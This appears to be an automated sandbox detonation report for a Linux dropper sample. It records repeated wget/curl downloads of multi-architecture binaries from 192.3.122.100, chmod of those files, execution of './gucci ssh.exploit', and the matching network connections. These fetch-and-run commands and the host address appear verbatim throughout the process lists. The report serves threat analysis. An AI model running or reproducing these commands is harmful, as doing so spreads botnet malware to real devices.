Analysis Overview
SHA256
99bd7484ae2c892b3c45d7a60ab1a13495a7ef6a94c2a59240f32ee2faf938ac
Threat Level: Shows suspicious behavior
The file 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 was found to show suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-28 17:02
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-28 17:02
Reported
2024-07-29 10:56
Platform
debian9-mipsbe-20240729-en
Max time kernel
10s
Max time network
9s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/gucci | /tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 | N/A |
Processes
/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118
[/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm5]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm6]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm7]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/m68k]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/m68k]
/bin/cat
[cat m68k]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/mips]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/mpsl]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/mpsl]
/bin/cat
[cat mpsl]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/ppc]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/ppc]
/bin/cat
[cat ppc]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/sh4]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/spc]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/x86]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/x86]
/bin/cat
[cat x86]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-28 17:02
Reported
2024-07-29 11:10
Platform
debian9-mipsel-20240729-en
Max time kernel
10s
Max time network
11s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/gucci | /tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 | N/A |
Processes
/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118
[/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm5]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm6]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm7]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/m68k]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/m68k]
/bin/cat
[cat m68k]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/mips]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/mpsl]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/mpsl]
/bin/cat
[cat mpsl]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/ppc]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/ppc]
/bin/cat
[cat ppc]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/sh4]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/spc]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/x86]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/x86]
/bin/cat
[cat x86]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-28 17:02
Reported
2024-07-29 11:23
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
2s
Max time network
128s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/gucci | /tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 | N/A |
Processes
/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118
[/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm5]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm6]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm7]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/m68k]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/m68k]
/bin/cat
[cat m68k]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/mips]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/mpsl]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/mpsl]
/bin/cat
[cat mpsl]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/ppc]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/ppc]
/bin/cat
[cat ppc]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/sh4]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/spc]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/x86]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/x86]
/bin/cat
[cat x86]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 192.3.122.100:80 | | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.65.91:443 | | tcp |
| US | 151.101.65.91:443 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| GB | 84.17.50.9:443 | | tcp |
| US | 192.3.122.100:80 | | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-28 17:02
Reported
2024-07-29 10:38
Platform
debian9-armhf-20240729-en
Max time kernel
20s
Max time network
21s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
